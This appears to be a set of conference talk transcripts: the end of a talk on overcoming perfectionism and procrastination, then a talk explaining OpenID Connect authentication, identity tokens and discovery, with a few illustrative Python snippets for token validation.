first two or three years I was on it and never was on it and now I'm like, just like it's weird. Just like this little weird physical tick that I do. So if you don't have any self-control like myself, then you can use a digital aid to help you block stuff. So great website, great apps that you can use. Rescue Time. There's another one called Concentrate, the getconcentrating.com. And then my favorite one actually is Hey Focus, which is Mac only. 
And what it does is it has a whole list of websites that it won't allow you to go to. And if you do try to go to the website, it puts up this great little screen and it gives you some deep Zen aphorism, like, well, you know, the monkey mind is... the path of the Tao is... and you're just like, oh, okay. And it totally helps you get right back into the flow. Second thing that you can do, if you don't want to get an app that will go into your system and know all your business, then you can use some browser extensions. So Leech Block and Iterol are some examples for Firefox, and for Google Chrome, Strict Workflow and Stay Focused are also good recommendations. Also, a lot of times it's not just the web that is a distraction, it's our phones. So you could be totally hitting it in the flow, working on stuff, and then the phone rings, or you get a text message, or, heaven forbid, you get a Twitter notification. When I get Twitter notifications, I actually get both the notification sound from Twitter and a text message sound, so I know that it's actually a tweet and not something else. But that can totally ruin it, of course: the thing is, you're working along, and then it goes off. Oh, horrible. So personally, when I'm really trying to stay focused and I'm trying to keep all the distractions out, I will put my phone in airplane mode, and if I'm hardcore, I'll just turn it off. Another thing you can do is to manage time through the Pomodoro technique. How many people have used the Pomodoro technique? Awesome. Okay, so for the people who haven't, what you do is you think about your time in blocks of 30 minutes. 25 minutes of that is your sprint, completely distraction free, which is why those blocking tools are really helpful and the airplane mode is helpful. Completely distraction free time for 25 minutes, working on a particular task.
Then for five minutes, you give yourself a break. Now one thing that I didn't say earlier about brainwave modes, one of the easiest ways to go into alpha brainwave mode is to lay down. Being prone actually forces your brain to change brainwave modes. So what I like to do for my breaks when I do the Pomodoro technique is for my five minutes I'll actually lay down in the ground and close my eyes and just breathe for a little bit and try to force my brain to go into a place where it actually does more imaginative and creative thinking. So you can do the Pomodoro technique. There's also something called 10 plus 2 times 5. So a shorter sprint than the 25 minutes. It's a 10 minute sprint, a 2 minute break and you do that five times to equal an hour. And then another thing you can do is you can run a dash time wise or you can fill a quota. So you can say, okay, I'm going to do X number of lines of code or I'm going to do so many sketches or I'm going to write so many paragraphs, whatever it is and then when that quota is done, you're finished. You give yourself a break or if you have the quota for the day, once it's done, no matter what time it is, you stop. And that's really important too. So remember that when you're doing all this stuff, like I said, if you're like doing the Prostination because you've got perfectionism because you've got all this stuff, remember that through this whole process you may slip on the Pomodoro. You may not actually stay focused all of that time, right? But remember that through the whole thing, you're learning through the whole process and there are no mistakes, there's just make, right? There's no fail, there's no nothing. You're just working on making stuff, you're just working on learning and growing and developing and becoming a better person. Now you may be wondering, for that story that I was telling you about, about my book writing, how did it end? What happened? What happened? I'm so curious. 
So let me tell you what ended up happening. So I started writing the book, or started the process at least, on June 29th, 2009. Yeah, I'm showing you how old I am now. So I ended up finishing the book in February of 2010. Now you may say to yourself, great, you finished a book. But my perfectionist kind of spoke up and was in charge of determining the schedule for myself. And I stupidly told the publisher, yeah, I think I can do it in four and a half months. If you talk to anybody who has written a tech book, they will tell you, which I didn't do, they will tell you: it takes nine months, almost across the board. It will take you nine months to write a substantial 250-whatever page book. That's how long it takes. That's how long it takes. Everybody will tell you that. I thought it was going to take me four and a half months because I thought I was superwoman. So when I was done with it in February, I was five months behind. So for me, that was a major fail. And that's one of the reasons why I pulled that six week all nighter, right? Because I was trying to catch up because I was so late. So that was a major fail. However, I did actually end up writing a book and getting it published. So in that respect, I was totally winning. Oh, right, by the way, total aside. When you guys did the power pose, I saw a few people do this. The people who did this, did you know that that is like the universal sign for victory? That blind people will do this when they're feeling triumphant. Did you know that? Isn't that fascinating? So, woo, winning on my book. I have a book. It's awesome. And not only that, but my evil nefarious plan for writing a book actually worked, because I actually wrote the book in a lot of ways so I could do this. So I could be in front of you and I could go and speak at conferences all around the world. So I mean, the book created all kinds of awesome.
Being able to do a TEDx talk in Germany by meeting the organizer on a Monday and the event was on a Thursday and he was like, yeah, I can put you on the roster. I was like, what? Doing my very first starting to do creativity workshops and then starting to keynote conferences which also was part of my dream. So writing the book was amazing even if the process was kind of difficult. So I did this talk just a couple of weeks ago at a conference in Wales called Port 80 and the morning of the talk, I woke up from having a really bad dream. And in this dream, I was driving along in a car with a friend of mine and drove and went over a bump and kind of didn't think a lot about it. I was like, oh, was it? I don't know. And as I was driving away, I looked in the rear view mirror and I found that I had driven over a little girl and that I had hurt this little girl. And instead of taking ownership and taking responsibility for it, I tried to act like it was okay and I kept driving. And then somehow or another, you know how dreams are, somehow or another, not too long after, somebody found out that I was the one that ran over the little girl and then I'm talking to the family and it's just escalating, completely getting out of control. Well, you know, we might have to like book you for vehicular manslaughter and blah, blah, blah. And I was like, oh my God. And when I woke up, I was so relieved to find out that it was just a dream. And I was thinking about it and I was like, what does this mean? What does this dream mean? Why am I having this dream? And then I started thinking about it and I started thinking, oh, that little girl is like my inner child and that when I'm being in perfectionist mode, when I'm being in procrastination mode, when my inner critic is in full regalia and like yelling at me, I'm running over this inner child, this inner creative child that I have and that's what we do. 
And it reminded me of this excerpt from Alice in Wonderland, I don't know if you guys are familiar with this, where the queen says, I can pay you with jam, but it's going to be jam tomorrow or jam yesterday, and Alice is just like, well, actually, you know, jam today would be nice, and the queen says, no, it's jam every other day, and today isn't every other day. Jam in my mind equals satisfaction, equals completion, equals reward, right? When you're a perfectionist procrastinator, when your inner critic is in full tilt, you never get the reward, right? You never end up getting jam. You're always pushing it off, pushing it off, and then sometimes you end up doing it, but it's too late, and then you've suffered so much already to get to that point, right? So I hope that by sharing my experiences and showing you that there are these alternatives, these actual, you know, practiced, studied, known ways to deal with the inner critic, to deal with perfectionism, to deal with procrastination, that you will understand that this creative adult, the creative adult that you could be, is the child that survived, the child that didn't get run over by your inner critic, right? And that you'll start to look at yourself differently, that you'll be more forgiving and more gentle and kinder to yourself, and that in doing that you'll be able to let yourself have all of those imperfect yet amazing ideas and realize that it's not going to be jam yesterday or jam tomorrow, that it will be, oops, jam today, because today is today and it's all we have. So thank you. So I've written several articles on creativity: one on banishing your inner critic, one on reigniting your creative spark on A List Apart, Four Secrets for Enhancing Creative Productivity, and of course Breaking the Perfectionism Procrastination Infinite Loop. So check those out, connect with me online, and have a great rest of the conference. Oops, I'll put it back. Thank you.
Your inner critic is an unconscious deterrent that stands between the seeds of great ideas and the fruits of achievement, keeping you stuck by telling you you’re just faking it, that others have more talent, that you’ll never achieve the success you seek. In this talk, we'll anatomize this pernicious inner force, and learn techniques to banish this critic so that you can have the mental space and energy to let your true talents emerge -- and help you be a badass with your work.
10.5446/50592 (DOI)
Welcome back. Who was in my previous talk? Okay, cool. So we are all already into the subject matter, almost. Again, just a reminder, right after this talk there's another really interesting talk which is very, you know, close to this subject, and that is how to apply this OpenID Connect protocol, which I'm going to show you now, to do mobile cross-app single sign-on, which is a hot topic these days. Because, you know, when you have several apps installed on your mobile device and you authenticate with one, with Google maybe, the other one shouldn't ask for the password again, things like that. So that's doable, and Pedro has done an implementation for that, so that's recommended to watch next if you care about these things. So actually this talk is pretty near and dear to my heart because it's about something that I've been busy with the last six months writing code for. Some of you may know we have this open source project called Identity Server, which was an implementation of WS Federation and WS Trust and a little bit of OAuth and a little bit of other stuff. And when OpenID Connect, this new protocol which is really promising, became closer and closer to its finalization, so around last December, Brock and me started, you know, going heads down and hacking code together, and we're at a point now where I can show it to you, so that's good. It's not done yet, but I can show it to you, I can point you to where you can download it, you can play with it, give us feedback if you want to, if you find bugs, send us pull requests, I'm sure there are plenty. It's not done yet, okay, but it's in a state where I can visualize the concepts. So yesterday evening I did this talk already and I realized, wow, it has become so easy to do authentication and API access now with this new protocol that I don't even need a full hour.
So if we have time in the end, please stay here, feel free to ask me questions about anything that, you know, you think was missing or that you want to know more about. Cool. So again, the talk has pretty much two parts: why are we doing that, and how are we doing it, okay? So let's look a little bit at the current typical application architectures from a security point of view, how they are solved today, what the problems are, and how we can improve on that in the future. So I guess the most common scenario is something like this: you have a web application and a human that sits in front of a browser. It talks to your application, it authenticates with your application. The application brings up a login form or something, you authenticate the user, you make sure he is who he is, you know, give him a cookie, and from that point on he's signed in, okay? And whenever this application talks to some back end service, a very common pattern to use here is that this back end service doesn't authenticate the user again, right? Because he has already been authenticated by the front end service. So all the back end service cares about is that it trusts the direct caller, which has already done the authentication. That's the way it works in many scenarios. And that is what we call a trusted subsystem, right? The service trusts its caller, the caller has authenticated the user, so the front end acts on behalf of the user. Now you know it's not 1980 anymore and we are not animals here, so we don't do authentication anymore in our own applications, right? We're using security token services or identity providers. In other words, the application is doing application stuff, and we have a separate service in our network, often called a security token service or identity provider, there are many names for it, which has only one job: authenticating the user and giving him back a security token, okay?
So the way this works is this: we go to our token service, authenticate the user, the user gets back a token, he sends the token to the application, the application validates the token, makes sure it's coming from a trusted source, gives the user a cookie, and from that point on the user is authenticated. And again, if this application talks to a back end service, very often this back end service doesn't care about the token itself or this user; it cares about the fact that it trusts the direct caller, and the direct caller does work on behalf of that authenticated user, okay? And then essentially we have expanded the trusted subsystem over to our identity provider, okay? So that is one type of application that people are building. Then on the other hand, oh sorry, I should have mentioned: the protocols we use today for doing that are very often either SAML2P or WS Federation. Who is using SAML2P in this room? Yeah? And who is using WS Federation? Okay. So yeah, SAML2P is a protocol that was, you know, designed a long time ago. I have water already, thank you. Yes? So SAML2P was designed for exactly these use cases, right? Web single sign-on across many web applications, and it's been around for quite some time. WS Federation is the Microsoft equivalent. Like, if you're living in Microsoft land, they prefer WS Federation. It's solving more or less the same problems as SAML2P does. And the issue is, if your applications are cross-platform, like one part is .NET and one part is Java, on the Java end of the world people do SAML2P; on the WS Federation end of the world, sorry, on the .NET framework end of the world, they use WS Federation. And they don't like each other very much. There are not really good SAML2P libraries for .NET, or they are commercial or proprietary, and it's vice versa. And if you have PHP and Node in the mix as well, then it gets even more complicated. Yes.
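As a rough sketch of the relying-party side of that flow, here is what the "validate the token, make sure it's coming from a trusted source" step can look like. This is a non-authoritative illustration in Python rather than .NET, and it deliberately skips signature verification, which a real implementation must perform against the token service's key before trusting anything. The issuer URL, audience name, and both helper functions are made up for illustration:

```python
import base64
import json
import time

def decode_jwt_payload(token):
    """Decode the payload of a JWT without verifying it.

    WARNING: a real relying party MUST verify the signature first;
    this sketch only illustrates inspecting the claims afterwards.
    """
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

def claims_look_trusted(claims, trusted_issuer, audience, now=None):
    """Check the three claims a relying party always cares about."""
    now = time.time() if now is None else now
    return (claims.get("iss") == trusted_issuer   # issued by our token service?
            and claims.get("aud") == audience     # intended for this application?
            and claims.get("exp", 0) > now)       # not expired?

# Build a toy unsigned token just to exercise the checks.
payload = {"iss": "https://sts.example.com", "aud": "webapp", "exp": 2_000_000_000}
body = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip("=")
toy_token = "eyJhbGciOiJub25lIn0." + body + "."

claims = decode_jwt_payload(toy_token)
print(claims_look_trusted(claims, "https://sts.example.com", "webapp"))
```

Only after these checks pass would the application issue its own cookie, which is what carries the authenticated session from then on.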
The other type of application that people build are what we call delegated access or delegated API access, where actually a user, for example, uses this application here. The application authenticates the user, but the back end service this application tries to call on behalf of the user does not trust its direct caller, okay? So let's say, for example, you're building a web application where users can log in and you provide a service where you can, you know, do statistics over their Twitter account, like how many retweets do you have, how many followers, how many unfollowers. Twitter doesn't trust your application, right? Why would they? They don't know you, yeah? Who they trust is the user, because the user has a trust relationship with Twitter because he has a Twitter account, okay? So there is no direct trust between the caller and the service. And if we think about mobile devices, yeah, where the application actually runs on the client and not in a browser which comes from a server, then this trust boundary is expanded down to the client, yeah? So why would Twitter directly trust an arbitrary application running on your phone, okay? And the way we solve these problems today is, again, by introducing a security token service. And this time it's often called an authorization server. And again, the pattern is very similar. The user goes first to the security token service, authenticates with the service, gets back an access token, and now this access token can be used to access that API, okay? Either like this or from a client device like this. And the trusted subsystem now essentially looks like this, okay? And again, there are protocols out there that were made for solving that problem, yeah? So if you're living in the SOAP world, it's called WS-Trust. Or if you are living in, you know, the modern world, it's called OAuth 2, yeah? And again, they have very specific use cases, namely being able to do this requesting a token.
So an application, often called a client, can act on behalf of a user via a potentially untrusted third party, okay? Your phone is untrusted by default, or by design even, yeah? So life would be good and we would have pretty good solutions for that if these scenarios would never occur in combination, right? So if we are in this world, we use OAuth. In the other world, we use WS Federation or SAML2P, and they never ever, you know, touch each other, these two scenarios. But when they do, then suddenly we have two protocols, yeah? One like SAML, one like OAuth, which come from two different decades even, yeah? Which work totally differently, and you have to kind of combine them together, and that doesn't really work that well, especially since, you know, SAML and WS Federation are based on XML, and SAML, there's a SAML token type and all these heavy standards like XML digital signatures, XML encryption, which are hard to deal with if you don't have a library like the .NET framework or some Java library, yeah? But not JavaScript, for example, which is an important target, yeah? So what's wrong with SAML, yeah? I already mentioned it. It's old, yeah? It wasn't designed for the modern use cases like delegated API access, yeah? And there's a guy called Craig Burton, he's an identity analyst and, you know, you typically shouldn't trust these people, but he had a nice quote which kind of says it all, yeah? SAML is the Windows XP of identity, which, you know, people use it, it kind of works, it works for the use cases that Windows XP was designed for 10 years ago or even longer, I can't even remember, yeah? But it has no future, okay? Which doesn't mean that SAML isn't useful, I mean, SAML is widely used, especially in Scandinavia, all the e-government stuff, your bank ID that you all love, yeah, is implemented using the SAML protocol, okay?
So it's not bad, it's just it has no future anymore, especially with devices which don't have an XML parser anymore, yeah? Figure that. So we need something new, a replacement for SAML, okay? Now what's wrong with OAuth? Well, some people would say there are many things wrong with OAuth, yeah? But in essence, this picture says a lot about what's wrong with OAuth. OAuth was designed for a really specific use case, for requesting access tokens for services. But companies like Facebook and Microsoft and Google turned it into an authentication protocol. They're like, log in with Google, log in with Facebook, yeah? And they said, we're doing OAuth, but they're lying. OAuth is not an authentication protocol. They made custom extensions to OAuth to teach it some tricks to do authentication, yeah? And guess what? They all came up with their own custom extensions for that, yeah? Facebook, Google, you name them. None of that was seamless, yeah? So in other words, they all wrote their own little version of OAuth, okay? And you know, that's why there are things like this OAuth.io library there, which says we support 50 plus providers, we support Facebook and Google and you name them. Why? Because they all work differently, okay? But what we really want is a protocol with which you can authenticate users, and it should work the same for all of the identity providers out there, yeah? Like Microsoft shipped this thing called Katana, and they're shipping authentication middleware in there, like how to authenticate users. And they have one middleware called the Google authentication middleware and one is the Facebook authentication middleware and the Twitter authentication middleware and the Microsoft authentication middleware, where in essence, you only want one, right? And you say, like, okay, here's the code to do authentication, use Twitter, use Microsoft, use our corporate STS, use the business partner's STS, okay?
So that is what's wrong with OAuth, that basically it got turned into a big mess by these companies. And this is where OpenID Connect comes in really, yeah? So when you go to the OpenID Connect website, it says it's a simple identity layer on top of OAuth. Whenever you hear the word simple, be careful, okay? The rest is totally true. It's a layer on top of OAuth, so they took the protocol OAuth, which on its own is okay. It was designed with the modern application scenarios in mind to start with, right? It was designed for mobile applications. It was designed for JavaScript based applications, for example, and it can work in desktop applications and server based applications equally well. So why not use that and add the authentication feature to it, but do it in a standardized way, okay? And by having many eyes looking at how they do it, hopefully we don't make the same silly mistakes as the others like Facebook who, you know, created buggy implementations, okay? So what is OpenID Connect? What does it add on top of OAuth? The first thing, and that's the most important one, it defines so-called identity tokens. So I said earlier, OAuth is a protocol to request access tokens, right? An access token is something that you send to a service to get access to that service. And an identity token is something that you send to an application so the application can validate that the user is legitimate. Completely different use cases, okay? And so they define the concept of an identity token. Now to make identity tokens useful, they must be standardized, right? I mean, your application should be able to validate this identity token coming from any OpenID Connect provider. So they're using the JSON Web Token format, which, it turns out, is pretty widely used these days, and that was the obvious choice, okay? JSON Web Tokens have a number of advantages, they are compact on the wire and they are JavaScript compatible, amongst other things.
They define standard choices for cryptography, how to protect these identity tokens, yeah? You don't want, you know, Google doing their own weird algorithm and Facebook using some standard and Microsoft using a standard plus some weird extension to it, yeah? So you want to have a set of crypto algorithms that you on your client side or on your application side can use to validate these tokens, and they give you a number of choices here, but they are all pretty, you know, sensible. They define how to validate identity tokens, yeah? Because obviously you still have to do some work to authenticate a user, and they tell you exactly in the spec, do this, do this, do this, do this, and if you're done with step number six then the user is authenticated, okay? They define so-called scopes. We'll talk about scopes in a second, for all those who weren't in my previous talk. You know, scopes are identifiers for services and they are service-defined, and OpenID Connect defines a set of scopes which are part of the spec, so you have a common set of scopes. And that's a very, very important point here. They take the authentication features from SAML and WS-Fed. They take the API access features from OAuth and combine them into a single protocol. So you know, you now can do authentication and API access with a single protocol, and even better, with a single round trip to a server. It's not like doing WS-Fed on the first leg and OAuth on the second. It's a single protocol now which does both. And it defines how this should work for different types of applications, okay? So when you go to the OpenID Connect website, that's how it looks. There are a number of specifications involved, yeah? There are the underpinnings, which is the whole OAuth protocol, or OAuth framework actually. There are JSON Web Tokens, JSON Web Signature, JSON Web Encryption. WebFinger is for discovery. I'll show you that in a second.
But you typically don't care about these things because there are libraries out there which do that, creating tokens, validating tokens and so on. What you care about is this thing called minimal in this box here. This is what you need to do to connect your application to an OpenID Connect provider, yeah? And as you will see, and that's the nice thing about OpenID Connect, what you have to do to do that is really minimal, okay? It's very easy. Then there are some other specs, you know, satellite specs like discovery, which is about metadata. I'll show you that as well. How to register applications, how to do session management like log in, log off, yeah? I mean, many people used OAuth for authentication, but OAuth didn't even have the notion of a log off, yeah? I mean, many people thought, okay, log in is done, I'm done. Log off is harder. Anybody who tried to do federated sign out over many, many computers knows that it's a hard problem to solve. Okay. So, the next thing that OpenID Connect defines are so-called flows. And flows, as I mentioned in my previous session, are basically just patterns for how different types of applications connect to an OpenID Connect provider. And since in OpenID Connect there are always humans involved, yeah, there are actually fewer flows than in OAuth, yeah? Only the flows that, you know, involve humans with login pages and all these things are actually present in OpenID Connect. So, the implicit flow is basically for applications running on a native platform or browser-based applications. And the authorization code flow is for applications running on a server, okay? Since applications that run on a server can also do client authentication, and with clients, I always mean, clients are the code that your users run, yeah? So, users and clients are different things. You can step up security with some extra features which we'll talk about later. And that's the hybrid flow.
The hybrid flow is for applications where one part lives on the client device, maybe like a native application on a mobile device, and one part lives on the server. So maybe, you know, you initiate the authentication process on the client, showing UI and all that stuff, and once you're done, you transfer some of the tokens to the back end and then do something on the back end. And that's, you know, for in-between scenarios. We don't look at that because, you know, once you understand the first two flows, it's easy to see how hybrid works. Cool. So I want to do a couple of excursions, yeah? Like explain to you some of the concepts that OpenID Connect brings to the table. And the first excursion I want to do is endpoints. So, OpenID Connect defines three endpoints that an OpenID Connect provider must implement, okay? One is called the authorize endpoint. And this is always when a human is involved. When you redirect a user to an OpenID Connect server, when you show a login page, for example, that is handled by the authorize endpoint, okay? It shows UI. The token endpoint is an API endpoint. This is where you can programmatically go to and request tokens or renew tokens, for example, or even revoke tokens, yeah? So that is for programmatic access. And the third thing that they specify is the so-called user info endpoint. And the user info endpoint is, think of it as a profile service, yeah? So let's say you are authenticating a user and you want to know his email address. The email address might not be in the token itself because you want to save space on the wire, but you can go to the user info endpoint and say, hey, here's the token, give me back the email address. Or give me back his first name, last name, profile picture. Stuff like that, yeah? Again, all of these Facebooks and Googles, they have this user info endpoint, but it was proprietary what data format they returned. The user info endpoint in OpenID Connect defines the data format so that it's interoperable, okay?
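To make the user info endpoint concrete, here is a minimal sketch of what such a call looks like on the wire: a GET with the access token presented as a Bearer credential. The endpoint URL and token below are made-up placeholders; a real client takes both from earlier steps of the protocol.

```python
from urllib.request import Request

# Placeholder values for illustration only; a real client gets the endpoint
# from discovery and the access token from the token response.
USERINFO_ENDPOINT = "https://idp.example/connect/userinfo"
access_token = "eyJ.sample.token"

# The user info endpoint is a plain HTTP API: present the access token as a
# Bearer credential and receive the user's profile claims back as JSON.
req = Request(
    USERINFO_ENDPOINT,
    headers={"Authorization": "Bearer " + access_token},
)

print(req.get_header("Authorization"))  # Bearer eyJ.sample.token
```

The response body would then be a JSON object of claims such as given_name, family_name and email, in the data format the spec standardizes.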
Cool. So let's talk about the simplest use case of OpenID Connect, which is a web application that wants to authenticate a user that is coming in via a browser, okay? That's, if you like, the SAML2P/WS Federation replacement, yeah? So the way this works is the web application redirects the user to the OpenID Connect authorize endpoint, that's the thing that shows the UI, yeah? And it constructs a number of query string parameters, and that is part of the OpenID Connect specification, yeah? So it says, hey, I'm client app one, yeah? Clients have to pre-register with the OpenID Connect provider, just like in SAML or WS-Fed as well. I want to authenticate the user, and that is the first scope that was standardized. Whenever you add the openid scope to a request, that means I want to authenticate the user, okay? And in addition, I want to know his email address, okay? That's the scope here. And when you're done, please send me the identity token back to this pre-registered URL, okay? So when app one got registered, it said, okay, that's my legitimate redirect URI, okay? What do you want to have back? An identity token. And how should I send it back to you? Via a form post, okay? So, sorry, the scopes that you can see here, profile, email, address, phone and offline access, these are the ones that are defined by the specification, yeah? And they map to claims that you can get back from the user info endpoint, like name and family name and given name and nickname and so on. Email address, or email verified, which means is the email address verified by the provider, for example, did they do a proper email verification, things like that, okay?
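Assembled into an actual redirect, those query string parameters might look like the sketch below. All values, the endpoint, client id, redirect URI, state and nonce, are illustrative placeholders, not taken from the talk's demo:

```python
from urllib.parse import urlencode

# Hypothetical provider endpoint and client registration values.
AUTHORIZE_ENDPOINT = "https://idp.example/connect/authorize"

params = {
    "client_id": "clientapp1",       # pre-registered client name
    "scope": "openid email",         # openid = authenticate the user; email = claim
    "redirect_uri": "https://app.example/signin-callback",  # pre-registered
    "response_type": "id_token",     # we want an identity token back
    "response_mode": "form_post",    # send it back via a form POST
    "state": "abc123",               # random value, echoed back on the response
    "nonce": "xyz789",               # random value, embedded in the id_token
}

url = AUTHORIZE_ENDPOINT + "?" + urlencode(params)
print(url)
```

The browser is then redirected to this URL, the provider shows its login (and optionally consent) UI, and posts the id_token back to the registered redirect URI.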
So now what happens is the user has to authenticate with the OpenID Connect provider, and then, and that is basically an OAuth concept and is optional based on the application you're writing, the user is asked, hey, there's this application here called, in that case, implicit client, and it asks for your email address, are you okay with releasing that identity information to a third party, okay? And in our implementation, you could uncheck that, and then the claim email wouldn't travel back to the application, for example, yeah? You can also turn off this screen, yeah? I mean, WS Federation and SAML2P didn't have that screen at all, so if you don't want that, turn it off, and basically the login screen is all they're gonna see. And then, as the last step, the OpenID Connect provider will send back the identity token via a form post, yeah? So it posts back via the client's browser back to the client. And that's again exactly how SAML2P and WS Federation worked, but it's much, much simpler now, because the only thing they're sending back is basically a form with a hidden input field, the name of the field is id underscore token, and the value is your JSON Web Token, okay? And why does it post back? Because I asked them to do so, right? The response mode was set to form post. There are other response modes, and you will see later how they look. Okay, so what I did, basically to kind of prove my point, is I wrote an OpenID Connect client without using any framework, yeah? Just plain .NET, to see how much work it would be to connect to the OpenID Connect provider, okay? I mean, the only thing you really need is a JSON Web Token library to validate the tokens, yeah? So what you have to do in code is you create two values here. One is called the state and one is called the nonce. A nonce is a number used once, yeah, so they're both random numbers, yeah? And they are both being sent to the OpenID Connect provider.
When the provider responds back to the client, the state will be on the URL, so they echo back the state on the response URL, and they put the nonce inside of the identity token. And that is done to make sure that when you get the response back, it was exactly the response that correlates to your original request, okay? Otherwise, someone could try sending you bogus tokens and, you know, something could go wrong, okay? So the next thing is a little helper, okay? That's a helper which basically takes the address of the authorize endpoint. I pass in my client ID. I say what I want to get back, an identity token. I say I want to authenticate the user. I want his email address. I tell them where to send the token back to. I pass in the state. I pass in the nonce, and I tell them please do a form post back to me, okay? Then I store the state and the nonce locally in a cookie so that when the response comes back, I can grab them and make sure they are valid, okay? And then I do a redirect to the server, okay? Now, when the server is done, it will call me back on the sign-in callback URL. So what I do is I get the identity token from the form. I get the state from the form. I make sure the token is valid, and the exact procedure for that is like this. I first retrieve my state and my nonce back from my cookie. If that cookie is not there, it's invalid. I make sure the state matches the state parameter I got back. If that doesn't match, it's invalid. Then I use the JwtSecurityTokenHandler class from Microsoft in this case to validate the JSON Web Token, and what you need to make sure is that the audience that you expect inside the token is your own client ID. And that is very, very important, yeah? You are a client with a name. You ask for a token. When the token comes back, you must make sure that the audience inside the token is actually you and not some other application, right? Otherwise you could be receiving tokens which you haven't asked for.
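The client-side procedure just described, generate a random state and nonce, then on the response check state, audience, issuer, expiry and nonce, can be sketched as follows. All names here are placeholders, and crucially, a real client must also verify the token's signature with a proper JWT library and the provider's published key, which this sketch omits.

```python
import base64
import json
import secrets
import time

# Before redirecting: create random state and nonce and remember them
# (the talk stores them in a protected cookie; a dict stands in here).
stored = {"state": secrets.token_urlsafe(16), "nonce": secrets.token_urlsafe(16)}

def b64url_decode(part: str) -> bytes:
    # Base64url without padding, as used in JSON Web Tokens.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def validate(id_token: str, returned_state: str, client_id: str, issuer: str) -> dict:
    """Sketch of the response checks; signature verification is NOT done here."""
    if returned_state != stored["state"]:
        raise ValueError("state mismatch")
    header_b64, claims_b64, _signature = id_token.split(".")
    claims = json.loads(b64url_decode(claims_b64))
    if claims["aud"] != client_id:          # token really meant for this client?
        raise ValueError("wrong audience")
    if claims["iss"] != issuer:             # issued by the trusted provider?
        raise ValueError("wrong issuer")
    if claims["exp"] < time.time():         # still valid?
        raise ValueError("token expired")
    if claims["nonce"] != stored["nonce"]:  # correlates with our request?
        raise ValueError("nonce mismatch")
    return claims
```

Only after all of these checks, plus the signature check, should the returned claims be used to sign the user in locally.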
The issuer, the name of the OpenID Connect issuer, that's a URL, and here's the public key that I use to validate the signature on the token. Then I call validate token, and then I get the nonce claim inside the token, make sure it matches my stored nonce, and then I get rid of the temp cookie and I return the claims back to my application. Okay? Pretty simple. And then once the token is validated, I have my claims here. I create a new claims identity and I sign the user in with my local cookie. Okay? So that's all the code you would have to write if you had no framework that implemented the protocol for you. And that's pretty cool because that code can be written on arbitrary platforms, PHP, Node.js, whatever, Java, and so on. You don't need something special for it. Okay, cool. So let's try that. Here's IdentityServer. The way we architected it, IdentityServer is now so-called OWIN middleware. So you can host that inside of your existing application, or as a separate application. You can host it outside of IIS, inside of IIS, as a Windows service, or on the command line as I'm doing right now, yeah? All the hosting code is more or less this here. Okay? Which is easy, it's great for testing. Let's run that application. Okay? So when I click the sign in link, I initiate the round trip to the server. Here's my login page. I log in with Alice. I click login. And I have configured consent for this application. So I will see the consent screen. So it says, okay, hello, Alice. Here's the application. It wants your identity, your user ID, and your email address. And should I ask you again next time, or do you want me to remember this decision? Okay? And then I basically just print out the claims of my local claims identity after I signed in the user using a cookie. Okay? And you can see what was in the token here. There's the issuer, there's the audience, the not-before, the expiration, the nonce that I talked about earlier, issued at. Yeah?
When was the token issued? What's the name of the user? The authentication method reference, so how did the user authenticate with the server? When did he authenticate with the server? And here's the email address I asked for. Okay? And when I'm done, I can say sign out, which means I basically go back to the identity provider on a special link, on the sign out link, and this will basically clear the cookie on the identity provider. Okay? Like this. And now I'm logged out again. So that's how it works. It's pretty simple. Yeah? That's the identity token that we got back. It's a JSON Web Token. As I mentioned, basically you see the claims are just key value pairs, JSON encoded. On the top, you see a header. Then basically they take the header, base64 encode it, take the claims, base64 encode them, put them into a string, and then take the signature over that string, and append the signature, base64 encoded, at the end, and that's what they send back over the wire. Okay? So that's the other excursion. The next excursion I want to show you is discovery. So you've seen that my code needs to know quite a few things, right? It needs to know where is the authorize endpoint, which key material is used, what's the issuer name, where is the logout endpoint, yeah? And OpenID Connect specifies this thing called the discovery document, and this is basically a JSON document that tells the client where all of these things are. Okay? So there's a URL that is specified by the specification. In my case it's localhost slash core, then slash .well-known/openid-configuration. Okay? And when we look here, you see things like what's the name of the provider, where's the authorize endpoint, where's the token endpoint, where's the user info endpoint, where's the logout endpoint, which scopes do we support, which response types do we support, which response modes, yeah? We've seen that form post is supported. We also support other response modes and so on.
Oh, and which algorithm are we using to sign the token? And that again is RS256, RSA with SHA-256. And also what you get is, when you follow this link here, that is the public key that we use to sign the tokens. So again, the client can discover that information automatically. Which means that you can write more clever code than the code I wrote, yeah? So there's the OpenID Connect middleware from Microsoft, which will ship in Katana version 3, yeah, which is due mid-summer, they said. And all you need to configure really is now, what's your client ID? What is the base address of the authorization server or the OpenID Connect server? Where do you want to get the token sent back to? What do you want as a response, ID token or token, and what scopes do you want to use? Okay, let's get rid of token. And that's all you have to configure now, yeah? Because now what happens is that this middleware goes to this base address, appends this /.well-known/openid-configuration URL, parses the document and auto-configures itself. Okay? And once it's done with the OpenID Connect handshake, it will use the locally configured cookie middleware, this one here, to sign the user into my application. No? Which also means that you don't have to do anything special to initiate the whole process, right? The only thing you really need to do is have an action method here which has the authorize attribute, which means, okay, we're going to create a 401, the middleware will catch the 401, turn it into a 302 going to the authorization server. So let's do this, and again, you see, I log in with Alice, and we are back. This time no consent. Why? Because we have consented before and I clicked the remember decision checkbox. Okay? And again, sign out works the same. We come back here and we are signed out. Any questions so far? Does it make sense? Is it hard? Is it harder than WS Federation? No, it isn't. So it's an improvement, right?
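The discovery document itself is just JSON. The trimmed-down sample below sketches the general shape of what a provider serves at its /.well-known/openid-configuration address; the concrete URLs are invented for illustration:

```python
import json

# Illustrative discovery document (heavily trimmed; real ones have more keys).
discovery_json = """{
  "issuer": "https://idp.example/core",
  "authorization_endpoint": "https://idp.example/core/connect/authorize",
  "token_endpoint": "https://idp.example/core/connect/token",
  "userinfo_endpoint": "https://idp.example/core/connect/userinfo",
  "end_session_endpoint": "https://idp.example/core/connect/endsession",
  "jwks_uri": "https://idp.example/core/.well-known/jwks",
  "scopes_supported": ["openid", "profile", "email"],
  "response_modes_supported": ["form_post", "query", "fragment"],
  "id_token_signing_alg_values_supported": ["RS256"]
}"""

doc = json.loads(discovery_json)

# A client can now auto-configure itself instead of hard-coding endpoints.
print(doc["authorization_endpoint"])
print(doc["id_token_signing_alg_values_supported"][0])  # RS256 = RSA with SHA-256
```

This is exactly what lets middleware like the one shown in the demo configure itself from nothing more than the provider's base address.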
